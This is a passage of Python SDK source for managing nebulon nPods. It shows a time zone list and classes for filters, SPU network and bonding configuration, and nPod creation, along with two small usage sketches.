``Antarctica/Macquarie``\n * ``Antarctica/Mawson``\n * ``Antarctica/McMurdo``\n * ``Antarctica/Palmer``\n * ``Antarctica/Rothera``\n * ``Antarctica/South_Pole``\n * ``Antarctica/Syowa``\n * ``Antarctica/Troll``\n * ``Antarctica/Vostok``\n * ``Arctic/Longyearbyen``\n * ``Asia/Aden``\n * ``Asia/Almaty``\n * ``Asia/Amman``\n * ``Asia/Anadyr``\n * ``Asia/Aqtau``\n * ``Asia/Aqtobe``\n * ``Asia/Ashgabat``\n * ``Asia/Ashkhabad``\n * ``Asia/Atyrau``\n * ``Asia/Baghdad``\n * ``Asia/Bahrain``\n * ``Asia/Baku``\n * ``Asia/Bangkok``\n * ``Asia/Barnaul``\n * ``Asia/Beirut``\n * ``Asia/Bishkek``\n * ``Asia/Brunei``\n * ``Asia/Calcutta``\n * ``Asia/Chita``\n * ``Asia/Choibalsan``\n * ``Asia/Chongqing``\n * ``Asia/Chungking``\n * ``Asia/Colombo``\n * ``Asia/Dacca``\n * ``Asia/Damascus``\n * ``Asia/Dhaka``\n * ``Asia/Dili``\n * ``Asia/Dubai``\n * ``Asia/Dushanbe``\n * ``Asia/Famagusta``\n * ``Asia/Gaza``\n * ``Asia/Harbin``\n * ``Asia/Hebron``\n * ``Asia/Ho_Chi_Minh``\n * ``Asia/Hong_Kong``\n * ``Asia/Hovd``\n * ``Asia/Irkutsk``\n * ``Asia/Istanbul``\n * ``Asia/Jakarta``\n * ``Asia/Jayapura``\n * ``Asia/Jerusalem``\n * ``Asia/Kabul``\n * ``Asia/Kamchatka``\n * ``Asia/Karachi``\n * ``Asia/Kashgar``\n * ``Asia/Kathmandu``\n * ``Asia/Katmandu``\n * ``Asia/Khandyga``\n * ``Asia/Kolkata``\n * ``Asia/Krasnoyarsk``\n * ``Asia/Kuala_Lumpur``\n * ``Asia/Kuching``\n * ``Asia/Kuwait``\n * ``Asia/Macao``\n * ``Asia/Macau``\n * ``Asia/Magadan``\n * ``Asia/Makassar``\n * ``Asia/Manila``\n * ``Asia/Muscat``\n * ``Asia/Nicosia``\n * ``Asia/Novokuznetsk``\n * ``Asia/Novosibirsk``\n * ``Asia/Omsk``\n * ``Asia/Oral``\n * ``Asia/Phnom_Penh``\n * ``Asia/Pontianak``\n * ``Asia/Pyongyang``\n * ``Asia/Qatar``\n * ``Asia/Qostanay``\n * ``Asia/Qyzylorda``\n * ``Asia/Rangoon``\n * ``Asia/Riyadh``\n * ``Asia/Saigon``\n * ``Asia/Sakhalin``\n * ``Asia/Samarkand``\n * ``Asia/Seoul``\n * ``Asia/Shanghai``\n * ``Asia/Singapore``\n * ``Asia/Srednekolymsk``\n * ``Asia/Taipei``\n * ``Asia/Tashkent``\n * ``Asia/Tbilisi``\n * ``Asia/Tehran``\n * ``Asia/Tel_Aviv``\n * ``Asia/Thimbu``\n * ``Asia/Thimphu``\n * ``Asia/Tokyo``\n * ``Asia/Tomsk``\n * ``Asia/Ujung_Pandang``\n * ``Asia/Ulaanbaatar``\n * ``Asia/Ulan_Bator``\n * ``Asia/Urumqi``\n * ``Asia/Ust-Nera``\n * ``Asia/Vientiane``\n * ``Asia/Vladivostok``\n * ``Asia/Yakutsk``\n * ``Asia/Yangon``\n * ``Asia/Yekaterinburg``\n * ``Asia/Yerevan``\n * ``Atlantic/Azores``\n * ``Atlantic/Bermuda``\n * ``Atlantic/Canary``\n * ``Atlantic/Cape_Verde``\n * ``Atlantic/Faeroe``\n * ``Atlantic/Faroe``\n * ``Atlantic/Jan_Mayen``\n * ``Atlantic/Madeira``\n * ``Atlantic/Reykjavik``\n * ``Atlantic/South_Georgia``\n * ``Atlantic/St_Helena``\n * ``Atlantic/Stanley``\n * ``Australia/ACT``\n * ``Australia/Adelaide``\n * ``Australia/Brisbane``\n * ``Australia/Broken_Hill``\n * ``Australia/Canberra``\n * ``Australia/Currie``\n * ``Australia/Darwin``\n * ``Australia/Eucla``\n * ``Australia/Hobart``\n * ``Australia/LHI``\n * ``Australia/Lindeman``\n * ``Australia/Lord_Howe``\n * ``Australia/Melbourne``\n * ``Australia/NSW``\n * ``Australia/North``\n * ``Australia/Perth``\n * ``Australia/Queensland``\n * ``Australia/South``\n * ``Australia/Sydney``\n * ``Australia/Tasmania``\n * ``Australia/Victoria``\n * ``Australia/West``\n * ``Australia/Yancowinna``\n * ``Brazil/Acre``\n * ``Brazil/DeNoronha``\n * ``Brazil/East``\n * ``Brazil/West``\n * ``CET``\n * ``CST6CDT``\n * ``Canada/Atlantic``\n * ``Canada/Central``\n * ``Canada/Eastern``\n * ``Canada/Mountain``\n * ``Canada/Newfoundland``\n * ``Canada/Pacific``\n * 
``Canada/Saskatchewan``\n * ``Canada/Yukon``\n * ``Chile/Continental``\n * ``Chile/EasterIsland``\n * ``Cuba``\n * ``EET``\n * ``EST``\n * ``EST5EDT``\n * ``Egypt``\n * ``Eire``\n * ``Etc/GMT``\n * ``Etc/GMT+0``\n * ``Etc/GMT+1``\n * ``Etc/GMT+10``\n * ``Etc/GMT+11``\n * ``Etc/GMT+12``\n * ``Etc/GMT+2``\n * ``Etc/GMT+3``\n * ``Etc/GMT+4``\n * ``Etc/GMT+5``\n * ``Etc/GMT+6``\n * ``Etc/GMT+7``\n * ``Etc/GMT+8``\n * ``Etc/GMT+9``\n * ``Etc/GMT-0``\n * ``Etc/GMT-1``\n * ``Etc/GMT-10``\n * ``Etc/GMT-11``\n * ``Etc/GMT-12``\n * ``Etc/GMT-13``\n * ``Etc/GMT-14``\n * ``Etc/GMT-2``\n * ``Etc/GMT-3``\n * ``Etc/GMT-4``\n * ``Etc/GMT-5``\n * ``Etc/GMT-6``\n * ``Etc/GMT-7``\n * ``Etc/GMT-8``\n * ``Etc/GMT-9``\n * ``Etc/GMT0``\n * ``Etc/Greenwich``\n * ``Etc/UCT``\n * ``Etc/UTC``\n * ``Etc/Universal``\n * ``Etc/Zulu``\n * ``Europe/Amsterdam``\n * ``Europe/Andorra``\n * ``Europe/Astrakhan``\n * ``Europe/Athens``\n * ``Europe/Belfast``\n * ``Europe/Belgrade``\n * ``Europe/Berlin``\n * ``Europe/Bratislava``\n * ``Europe/Brussels``\n * ``Europe/Bucharest``\n * ``Europe/Budapest``\n * ``Europe/Busingen``\n * ``Europe/Chisinau``\n * ``Europe/Copenhagen``\n * ``Europe/Dublin``\n * ``Europe/Gibraltar``\n * ``Europe/Guernsey``\n * ``Europe/Helsinki``\n * ``Europe/Isle_of_Man``\n * ``Europe/Istanbul``\n * ``Europe/Jersey``\n * ``Europe/Kaliningrad``\n * ``Europe/Kiev``\n * ``Europe/Kirov``\n * ``Europe/Lisbon``\n * ``Europe/Ljubljana``\n * ``Europe/London``\n * ``Europe/Luxembourg``\n * ``Europe/Madrid``\n * ``Europe/Malta``\n * ``Europe/Mariehamn``\n * ``Europe/Minsk``\n * ``Europe/Monaco``\n * ``Europe/Moscow``\n * ``Europe/Nicosia``\n * ``Europe/Oslo``\n * ``Europe/Paris``\n * ``Europe/Podgorica``\n * ``Europe/Prague``\n * ``Europe/Riga``\n * ``Europe/Rome``\n * ``Europe/Samara``\n * ``Europe/San_Marino``\n * ``Europe/Sarajevo``\n * ``Europe/Saratov``\n * ``Europe/Simferopol``\n * ``Europe/Skopje``\n * ``Europe/Sofia``\n * ``Europe/Stockholm``\n * ``Europe/Tallinn``\n * ``Europe/Tirane``\n * ``Europe/Tiraspol``\n * ``Europe/Ulyanovsk``\n * ``Europe/Uzhgorod``\n * ``Europe/Vaduz``\n * ``Europe/Vatican``\n * ``Europe/Vienna``\n * ``Europe/Vilnius``\n * ``Europe/Volgograd``\n * ``Europe/Warsaw``\n * ``Europe/Zagreb``\n * ``Europe/Zaporozhye``\n * ``Europe/Zurich``\n * ``Factory``\n * ``GB``\n * ``GB-Eire``\n * ``GMT``\n * ``GMT+0``\n * ``GMT-0``\n * ``GMT0``\n * ``Greenwich``\n * ``HST``\n * ``Hongkong``\n * ``Iceland``\n * ``Indian/Antananarivo``\n * ``Indian/Chagos``\n * ``Indian/Christmas``\n * ``Indian/Cocos``\n * ``Indian/Comoro``\n * ``Indian/Kerguelen``\n * ``Indian/Mahe``\n * ``Indian/Maldives``\n * ``Indian/Mauritius``\n * ``Indian/Mayotte``\n * ``Indian/Reunion``\n * ``Iran``\n * ``Israel``\n * ``Jamaica``\n * ``Japan``\n * ``Kwajalein``\n * ``Libya``\n * ``MET``\n * ``MST``\n * ``MST7MDT``\n * ``Mexico/BajaNorte``\n * ``Mexico/BajaSur``\n * ``Mexico/General``\n * ``NZ``\n * ``NZ-CHAT``\n * ``Navajo``\n * ``PRC``\n * ``PST8PDT``\n * ``Pacific/Apia``\n * ``Pacific/Auckland``\n * ``Pacific/Bougainville``\n * ``Pacific/Chatham``\n * ``Pacific/Chuuk``\n * ``Pacific/Easter``\n * ``Pacific/Efate``\n * ``Pacific/Enderbury``\n * ``Pacific/Fakaofo``\n * ``Pacific/Fiji``\n * ``Pacific/Funafuti``\n * ``Pacific/Galapagos``\n * ``Pacific/Gambier``\n * ``Pacific/Guadalcanal``\n * ``Pacific/Guam``\n * ``Pacific/Honolulu``\n * ``Pacific/Johnston``\n * ``Pacific/Kiritimati``\n * ``Pacific/Kosrae``\n * ``Pacific/Kwajalein``\n * ``Pacific/Majuro``\n * ``Pacific/Marquesas``\n * ``Pacific/Midway``\n * ``Pacific/Nauru``\n * 
``Pacific/Niue``\n * ``Pacific/Norfolk``\n * ``Pacific/Noumea``\n * ``Pacific/Pago_Pago``\n * ``Pacific/Palau``\n * ``Pacific/Pitcairn``\n * ``Pacific/Pohnpei``\n * ``Pacific/Ponape``\n * ``Pacific/Port_Moresby``\n * ``Pacific/Rarotonga``\n * ``Pacific/Saipan``\n * ``Pacific/Samoa``\n * ``Pacific/Tahiti``\n * ``Pacific/Tarawa``\n * ``Pacific/Tongatapu``\n * ``Pacific/Truk``\n * ``Pacific/Wake``\n * ``Pacific/Wallis``\n * ``Pacific/Yap``\n * ``Poland``\n * ``Portugal``\n * ``ROC``\n * ``ROK``\n * ``Singapore``\n * ``Turkey``\n * ``UCT``\n * ``US/Alaska``\n * ``US/Aleutian``\n * ``US/Arizona``\n * ``US/Central``\n * ``US/East-Indiana``\n * ``US/Eastern``\n * ``US/Hawaii``\n * ``US/Indiana-Starke``\n * ``US/Michigan``\n * ``US/Mountain``\n * ``US/Pacific``\n * ``US/Samoa``\n * ``UTC``\n * ``Universal``\n * ``W-SU``\n * ``WET``\n * ``Zulu``\n \"\"\"\n\n def __init__(\n self,\n time_zone: str\n ):\n \"\"\"Constructs a new input object to set timezone\n\n :param time_zone: The time zone to set as a timezone string\n :type time_zone: str\n \"\"\"\n\n self.__time_zone = time_zone\n\n @property\n def time_zone(self) -> str:\n \"\"\"The time zone to set\"\"\"\n return self.__time_zone\n\n @property\n def as_dict(self):\n result = dict()\n result[\"timeZone\"] = self.time_zone\n return result\n\n\nclass NPodSort:\n \"\"\"A sort object for nPods\n\n Allows sorting nPods on common properties. The sort object allows\n only one property to be specified.\n \"\"\"\n\n def __init__(\n self,\n name: SortDirection = None\n ):\n \"\"\"Constructs a new sort object for nPods\n\n :param name: Sort direction for the ``name`` property\n :type name: SortDirection, optional\n \"\"\"\n\n self.__name = name\n\n @property\n def name(self) -> SortDirection:\n \"\"\"Sort direction for the ``name`` property\"\"\"\n return self.__name\n\n @property\n def as_dict(self):\n result = dict()\n result[\"name\"] = self.name\n return result\n\n\nclass NPodFilter:\n \"\"\"A filter object to filter nPods.\n\n Allows filtering for specific nPods in nebulon ON. The\n filter allows only one property to be specified. 
If filtering on multiple\n properties is needed, use the ``and_filter`` and ``or_filter`` options to\n concatenate multiple filters.\n \"\"\"\n\n def __init__(\n self,\n uuid: UUIDFilter = None,\n name: StringFilter = None,\n npod_group_uuid: UUIDFilter = None,\n npod_template_uuid: UUIDFilter = None,\n npod_base_template_uuid: UUIDFilter = None,\n spu_serial: StringFilter = None,\n and_filter=None,\n or_filter=None\n ):\n \"\"\"Constructs a new filter object\n\n :param uuid: Filter based on nPod unique identifiers\n :type uuid: UUIDFilter, optional\n :param name: Filter based on nPod name\n :type name: StringFilter, optional\n :param npod_group_uuid: Filter based on the nPod group unique identifier\n :type npod_group_uuid: UUIDFilter, optional\n :param npod_template_uuid: Filter based on the nPod template associated\n with the nPod\n :type npod_template_uuid: UUIDFilter, optional\n :param npod_base_template_uuid: Filter based on the base nPod template\n associated with the nPod\n :type npod_base_template_uuid: UUIDFilter, optional\n :param spu_serial: Filter based on a SPU serial number that is part of\n the nPod\n :type spu_serial: StringFilter, optional\n :param and_filter: Concatenate another filter with a logical AND\n :type and_filter: NPodFilter, optional\n :param or_filter: Concatenate another filter with a logical OR\n :type or_filter: NPodFilter, optional\n \"\"\"\n\n self.__uuid = uuid\n self.__name = name\n self.__npod_group_uuid = npod_group_uuid\n self.__npod_template_uuid = npod_template_uuid\n self.__npod_base_template_uuid = npod_base_template_uuid\n self.__spu_serial = spu_serial\n self.__and = and_filter\n self.__or = or_filter\n\n @property\n def uuid(self) -> UUIDFilter:\n \"\"\"Filter based on nPod unique identifiers\"\"\"\n return self.__uuid\n\n @property\n def name(self) -> StringFilter:\n \"\"\"Filter based on nPod name\"\"\"\n return self.__name\n\n @property\n def npod_group_uuid(self) -> UUIDFilter:\n \"\"\"Filter based on the nPod group unique identifier\"\"\"\n return self.__npod_group_uuid\n\n @property\n def npod_template_uuid(self) -> UUIDFilter:\n \"\"\"Filter based on the nPod template associated with the nPod\"\"\"\n return self.__npod_template_uuid\n\n @property\n def npod_base_template_uuid(self) -> UUIDFilter:\n \"\"\"Filter based on the base nPod template associated with the nPod\"\"\"\n return self.__npod_base_template_uuid\n\n @property\n def spu_serial(self) -> StringFilter:\n \"\"\"Filter based on a SPU serial number that is part of the nPod\"\"\"\n return self.__spu_serial\n\n @property\n def and_filter(self):\n \"\"\"Allows concatenation of multiple filters via logical AND\"\"\"\n return self.__and\n\n @property\n def or_filter(self):\n \"\"\"Allows concatenation of multiple filters via logical OR\"\"\"\n return self.__or\n\n @property\n def as_dict(self):\n result = dict()\n result[\"uuid\"] = self.uuid\n result[\"name\"] = self.name\n result[\"nPodGroupUUID\"] = self.npod_group_uuid\n result[\"nPodTemplateUUID\"] = self.npod_template_uuid\n result[\"nPodBaseTemplateUUID\"] = self.npod_base_template_uuid\n result[\"spuSerial\"] = self.spu_serial\n result[\"and\"] = self.and_filter\n result[\"or\"] = self.or_filter\n return result
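\n\n\n# --- Illustrative usage sketch (added here for clarity; not part of the\n# original SDK source). It builds a filter for nPods named \"production\" that\n# also belong to a given nPod group, using ``and_filter`` to combine the two\n# single-property filters as described above. ``StringFilter(equals=...)`` is\n# assumed to support an equality match, mirroring how ``UUIDFilter(equals=...)``\n# is used later in this module.\ndef _example_npod_filter(npod_group_uuid: str) -> NPodFilter:\n return NPodFilter(\n name=StringFilter(equals=\"production\"),\n and_filter=NPodFilter(\n npod_group_uuid=UUIDFilter(equals=npod_group_uuid)\n )\n )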
\n\n\nclass IPInfoConfigInput:\n \"\"\"An input object to configure SPU networking\n\n SPU network configuration is determined at nPod creation. Customers have\n the option to use static IP addresses for the data network or DHCP.\n When using DHCP, it is recommended to use static IP reservations for the\n data networks.\n\n Customers can choose between using two separate networks for the data\n network or a link aggregation. When using link aggregation, two\n interface names are expected; otherwise, one.\n\n When specifying an IP address, it can be either IPv4 or IPv6 and supports\n the CIDR address format.\n \"\"\"\n\n def __init__(\n self,\n dhcp: bool,\n bond_mode: BondType,\n interfaces: List[str],\n address: str = \"\",\n netmask_bits: int = 0,\n gateway: str = \"\",\n half_duplex: bool = False,\n speed_mb: int = 0,\n locked_speed: bool = False,\n mtu: int = 1500,\n bond_transmit_hash_policy: BondTransmitHashPolicy = None,\n bond_mii_monitor_ms: int = None,\n bond_lacp_transmit_rate: BondLACPTransmitRate = None\n ):\n \"\"\"Constructs a new input object for configuring SPU networking\n\n :param dhcp: Specifies if DHCP should be used for the data network. If\n set to ``True``, the fields ``address``, ``netmask_bits``, and\n ``gateway`` should not be specified. If set to ``False``, these\n values become mandatory.\n :type dhcp: bool\n :param bond_mode: Specifies the link aggregation mode for the data\n network ports. If not set to ``None``, the ``interfaces`` parameter\n must be an array that lists the names of both interfaces:\n ``['enP8p1s0f0np0', 'enP8p1s0f1np1']``. If set to ``None``, the\n specific interface must be identified by its name.\n :type bond_mode: BondType\n :param interfaces: List of interfaces that shall be configured with\n this object. If ``bond_mode`` is set to ``None`` a single interface\n shall be specified. If set to a link aggregation mode both data\n interface names shall be specified. Options are ``enP8p1s0f0np0``\n and ``enP8p1s0f1np1``.\n :type interfaces: List[str]\n :param address: The IPv4 or IPv6 address for the data network interface.\n If CIDR format is used, the ``netmask_bits`` value is ignored. If\n ``dhcp`` is set to ``True``, this field must not be specified.\n :type address: str, optional\n :param netmask_bits: The network mask in bits. If ``address`` is\n specified in CIDR format, this value will be ignored, otherwise\n this is a mandatory field.\n :type netmask_bits: int, optional\n :param gateway: The network gateway address for the network interface.\n If ``dhcp`` is set to ``True`` this field is optional and ignored.\n If a static IP address is used, this field is mandatory.\n :type gateway: str, optional\n :param half_duplex: Specifies if the network interface shall use\n half duplex. By default, this field is set to ``False``, which is\n the recommended setting.\n :type half_duplex: bool, optional\n :param speed_mb: Allows setting the interface speed to a specific\n value. This field is ignored when ``locked_speed`` is set to\n ``False`` (default). It is not recommended to set this value.\n :type speed_mb: int, optional\n :param locked_speed: Allows setting the interface speed and the\n duplex mode to specific values. If set to ``True`` the values of\n ``speed_mb`` and ``half_duplex`` are enforced. It is recommended to\n set this value to ``False``.\n :type locked_speed: bool, optional\n :param mtu: Allows setting the maximum transfer unit (MTU) for the\n interface. By default an MTU of ``1500`` is used.\n :type mtu: int, optional\n :param bond_transmit_hash_policy: Allows specifying the transmit hashing\n policy mode when using link aggregation.
This field is ignored when\n ``bond_mode`` is set to ``None``.\n :type bond_transmit_hash_policy: BondTransmitHashPolicy, optional\n :param bond_mii_monitor_ms: Allows altering the default media\n independent interface monitoring interval. This field is ignored\n when ``bond_mode`` is set to ``None``.\n :type bond_mii_monitor_ms: int, optional\n :param bond_lacp_transmit_rate: Allows altering the default LACP\n transmit rate. This field is ignored if ``bond_mode`` is not set to\n ``BondMode8023ad``.\n :type bond_lacp_transmit_rate: BondLACPTransmitRate, optional\n \"\"\"\n\n self.__dhcp = dhcp\n self.__address = address\n self.__netmask_bits = netmask_bits\n self.__gateway = gateway\n self.__bond_mode = bond_mode\n self.__bond_transmit_hash_policy = bond_transmit_hash_policy\n self.__bond_mii_monitor_ms = bond_mii_monitor_ms\n self.__bond_lacp_transmit_rate = bond_lacp_transmit_rate\n self.__interfaces = interfaces\n self.__half_duplex = half_duplex\n self.__speed_mb = speed_mb\n self.__locked_speed = locked_speed\n self.__mtu = mtu\n\n @property\n def dhcp(self) -> bool:\n \"\"\"Specifies if DHCP should be used for the data network.\"\"\"\n return self.__dhcp\n\n @property\n def address(self) -> str:\n \"\"\"IPv4 or IPv6 address if a static IP address is used\"\"\"\n return self.__address\n\n @property\n def netmask_bits(self) -> int:\n \"\"\"Netmask in bits if a static IP address is used\"\"\"\n return self.__netmask_bits\n\n @property\n def gateway(self) -> str:\n \"\"\"Gateway IP address if a static IP address is used\"\"\"\n return self.__gateway\n\n @property\n def bond_mode(self) -> BondType:\n \"\"\"Link aggregation mode for the data interfaces\"\"\"\n return self.__bond_mode\n\n @property\n def bond_transmit_hash_policy(self) -> BondTransmitHashPolicy:\n \"\"\"Allows specifying the transmit hashing policy\"\"\"\n return self.__bond_transmit_hash_policy\n\n @property\n def bond_mii_monitor_ms(self) -> int:\n \"\"\"Allows specifying the MII monitor interval\"\"\"\n return self.__bond_mii_monitor_ms\n\n @property\n def bond_lacp_transmit_rate(self) -> BondLACPTransmitRate:\n \"\"\"Allows specifying the LACP transmit rate\"\"\"\n return self.__bond_lacp_transmit_rate\n\n @property\n def interfaces(self) -> list:\n \"\"\"List of interfaces to include in the configuration\"\"\"\n return self.__interfaces\n\n @property\n def half_duplex(self) -> bool:\n \"\"\"Allows overwriting duplex settings for the interface\"\"\"\n return self.__half_duplex\n\n @property\n def speed_mb(self) -> int:\n \"\"\"Allows overwriting interface speed\"\"\"\n return self.__speed_mb\n\n @property\n def locked_speed(self) -> bool:\n \"\"\"Allows locking interface speed\"\"\"\n return self.__locked_speed\n\n @property\n def mtu(self) -> int:\n \"\"\"Allows specifying MTU\"\"\"\n return self.__mtu\n\n @property\n def as_dict(self):\n result = dict()\n result[\"dhcp\"] = self.dhcp\n result[\"addr\"] = self.address\n result[\"netmaskBits\"] = self.netmask_bits\n result[\"gateway\"] = self.gateway\n result[\"bondModeV2\"] = self.bond_mode\n result[\"bondTransmitHashPolicy\"] = self.bond_transmit_hash_policy\n result[\"bondMIIMonitorMilliSeconds\"] = self.bond_mii_monitor_ms\n result[\"bondLACPTransmitRate\"] = self.bond_lacp_transmit_rate\n result[\"interfaces\"] = self.interfaces\n result[\"halfDuplex\"] = self.half_duplex\n result[\"speedMB\"] = self.speed_mb\n result[\"lockedSpeed\"] = self.locked_speed\n result[\"mtu\"] = self.mtu\n return result
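\n\n\n# --- Illustrative usage sketch (added here for clarity; not part of the\n# original SDK source). It shows one DHCP-based configuration that joins both\n# data ports into an LACP bond, following the interface names and enum values\n# documented in the constructor above.\ndef _example_bonded_dhcp_config() -> IPInfoConfigInput:\n # both data ports joined into one IEEE 802.3ad bond, addressed via DHCP\n return IPInfoConfigInput(\n dhcp=True,\n bond_mode=BondType.BondMode8023ad,\n interfaces=[\"enP8p1s0f0np0\", \"enP8p1s0f1np1\"],\n bond_transmit_hash_policy=BondTransmitHashPolicy.TransmitHashPolicyLayer34,\n bond_lacp_transmit_rate=BondLACPTransmitRate.LACPTransmitRateFast\n )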
\n\n\nclass NPodSpuInput:\n \"\"\"An input object to configure SPUs for nPod creation\n\n Allows specifying SPU configuration options when creating a new nPod.\n Configuration is mostly for network settings.\n \"\"\"\n\n def __init__(\n self,\n spu_serial: str,\n spu_name: str = None,\n spu_data_ips: List[IPInfoConfigInput] = None\n ):\n \"\"\"Constructs a new NPodSpuInput object\n\n Allows specifying SPU configuration options when creating a new nPod.\n Configuration is mostly for network configuration.\n\n :param spu_serial: Specifies the SPU serial number\n :type spu_serial: str\n :param spu_name: A human readable name for the SPU\n :type spu_name: str, optional\n :param spu_data_ips: Allows configuring the SPU's network interfaces\n :type spu_data_ips: List[IPInfoConfigInput], optional\n \"\"\"\n\n self.__spu_name = spu_name\n self.__spu_serial = spu_serial\n self.__spu_data_ips = spu_data_ips\n\n if self.__spu_name is None:\n self.__spu_name = spu_serial\n\n @property\n def spu_name(self) -> str:\n \"\"\"Human readable name for the SPU. Defaults to the SPU serial number\"\"\"\n return self.__spu_name\n\n @property\n def spu_serial(self) -> str:\n \"\"\"Serial number for the SPU\"\"\"\n return self.__spu_serial\n\n @property\n def spu_data_ips(self) -> List[IPInfoConfigInput]:\n \"\"\"Allows configuring the SPU's network interfaces\"\"\"\n return self.__spu_data_ips\n\n @property\n def as_dict(self):\n result = dict()\n result[\"SPUName\"] = self.spu_name\n result[\"SPUSerial\"] = self.spu_serial\n result[\"SPUDataIPs\"] = self.spu_data_ips\n return result\n\n\nclass CreateNPodInput:\n \"\"\"An input object to create a new nPod\n\n A nPod is a collection of network-connected application servers with SPUs\n installed that form an application cluster. Together, the SPUs in a nPod\n serve shared or local storage to the servers in the application cluster,\n e.g. a hypervisor cluster, container platform, or clustered bare metal\n application.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n npod_group_uuid: str,\n spus: List[NPodSpuInput],\n npod_template_uuid: str,\n note: str = None,\n timezone: str = 'UTC'\n ):\n \"\"\"Constructs a new input object to create a new nPod\n\n :param name: Name of the new nPod\n :type name: str\n :param npod_group_uuid: The unique identifier of the nPod group this\n nPod will be added to\n :type npod_group_uuid: str\n :param spus: List of SPU configuration information that will be used\n in the new nPod.
At least 3 SPU configuration information objects\n must be specified\n :type spus: List[NPodSpuInput]\n :param npod_template_uuid: The unique identifier of the nPod template\n to use for the new nPod\n :type npod_template_uuid: str\n :param note: An optional note for the new nPod\n :type note: str, optional\n :param timezone: The timezone to be configured for all SPUs in the nPod.\n By default the ``UTC`` timezone is used.\n :type timezone: str, optional\n \"\"\"\n\n self.__name = name\n self.__npod_group_uuid = npod_group_uuid\n self.__spus = spus\n self.__npod_template_uuid = npod_template_uuid\n self.__note = note\n self.__timezone = timezone\n\n @property\n def name(self) -> str:\n \"\"\"Name of the new nPod\"\"\"\n return self.__name\n\n @property\n def npod_group_uuid(self) -> str:\n \"\"\"The unique identifier of the nPod group this nPod will be added to\"\"\"\n return self.__npod_group_uuid\n\n @property\n def spus(self) -> List[NPodSpuInput]:\n \"\"\"List of SPU configuration information for SPUs to use\"\"\"\n return self.__spus\n\n @property\n def npod_template_uuid(self) -> str:\n \"\"\"The unique identifier of the nPod template to use\"\"\"\n return self.__npod_template_uuid\n\n @property\n def note(self) -> str:\n \"\"\"An optional note for the new nPod\"\"\"\n return self.__note\n\n @property\n def timezone(self) -> str:\n \"\"\"The timezone to be configured for all SPUs in the nPod\"\"\"\n return self.__timezone\n\n @property\n def as_dict(self):\n result = dict()\n result[\"nPodName\"] = self.name\n result[\"nPodGroupUUID\"] = self.npod_group_uuid\n result[\"spus\"] = self.spus\n result[\"nPodTemplateUUID\"] = self.npod_template_uuid\n result[\"note\"] = self.note\n result[\"timeZone\"] = self.timezone\n return result\n\n\nclass NPod:\n \"\"\"Defines a nebulon Pod (nPod)\n\n A nPod is a collection of network-connected application servers with SPUs\n installed that form an application cluster. Together, the SPUs in a nPod\n serve shared or local storage to the servers in the application cluster,\n e.g. a hypervisor cluster, container platform, or clustered bare metal\n application.\n \"\"\"\n\n def __init__(\n self,\n response: dict\n ):\n \"\"\"Constructs a new nPod object\n\n This constructor expects a ``dict`` object from the nebulon ON API. 
It\n will check the returned data against the currently implemented schema\n of the SDK.\n\n :param response: The JSON response from the server\n :type response: dict\n\n :raises ValueError: An error if illegal data is returned from the server\n \"\"\"\n\n self.__uuid = read_value(\n \"uuid\", response, str, True)\n self.__name = read_value(\n \"name\", response, str, True)\n self.__note = read_value(\n \"note\", response, str, True)\n self.__npod_group_uuid = read_value(\n \"nPodGroup.uuid\", response, str, False)\n self.__volume_uuids = read_value(\n \"volumes.uuid\", response, str, False)\n self.__volume_count = read_value(\n \"volumeCount\", response, int, True)\n self.__host_uuids = read_value(\n \"hosts.uuid\", response, str, False)\n self.__host_count = read_value(\n \"hostCount\", response, int, True)\n self.__spu_serials = read_value(\n \"spus.serial\", response, str, False)\n self.__spu_count = read_value(\n \"spuCount\", response, int, True)\n self.__snapshot_uuids = read_value(\n \"snapshots.uuid\", response, str, False)\n self.__update_history = read_value(\n \"updateHistory\", response, UpdateHistory, False)\n self.__npod_template_uuid = read_value(\n \"nPodTemplate.uuid\", response, str, False)\n self.__creation_time = read_value(\n \"creationTime\", response, datetime, True)\n self.__recommended_package = read_value(\n \"recommendedPackage\", response, NPodRecommendedPackage, False)\n self.__immutable_boot_volumes = read_value(\n \"immutableBootVolumes\", response, bool, True)\n self.__immutable_boot_volumes_note = read_value(\n \"immutableBootVolumesNote\", response, str, False)\n self.__immutable_boot_volumes_snapshot_time = read_value(\n \"immutableBootVolumesSnapshotTime\", response, datetime, False)\n\n @property\n def uuid(self) -> str:\n \"\"\"The unique identifier of the nPod\"\"\"\n return self.__uuid\n\n @property\n def name(self) -> str:\n \"\"\"The name of the nPod\"\"\"\n return self.__name\n\n @property\n def note(self) -> str:\n \"\"\"An optional note for the nPod\"\"\"\n return self.__note\n\n @property\n def npod_group_uuid(self) -> str:\n \"\"\"The unique identifier of the nPod group this nPod belongs to\"\"\"\n return self.__npod_group_uuid\n\n @property\n def volume_uuids(self) -> List[str]:\n \"\"\"List of volume identifiers defined in this nPod\"\"\"\n return self.__volume_uuids\n\n @property\n def volume_count(self) -> int:\n \"\"\"Number of volumes defined in this nPod\"\"\"\n return self.__volume_count\n\n @property\n def host_uuids(self) -> list:\n \"\"\"List of host identifiers part of this nPod\"\"\"\n return self.__host_uuids\n\n @property\n def host_count(self) -> int:\n \"\"\"Number of hosts part of this nPod\"\"\"\n return self.__host_count\n\n @property\n def spu_serials(self) -> list:\n \"\"\"List of serial numbers part of this nPod\"\"\"\n return self.__spu_serials\n\n @property\n def spu_count(self) -> int:\n \"\"\"Number of spus part of this nPod\"\"\"\n return self.__spu_count\n\n @property\n def snapshot_uuids(self) -> list:\n \"\"\"List of snapshot identifiers defined in this nPod\"\"\"\n return self.__snapshot_uuids\n\n @property\n def update_history(self) -> List[UpdateHistory]:\n \"\"\"List of updates performed on this nPod\"\"\"\n return self.__update_history\n\n @property\n def npod_template_uuid(self) -> str:\n \"\"\"Unique identifier for the nPod template used during nPod creation\"\"\"\n return self.__npod_template_uuid\n\n @property\n def creation_time(self) -> datetime:\n \"\"\"The date and time when the nPod was 
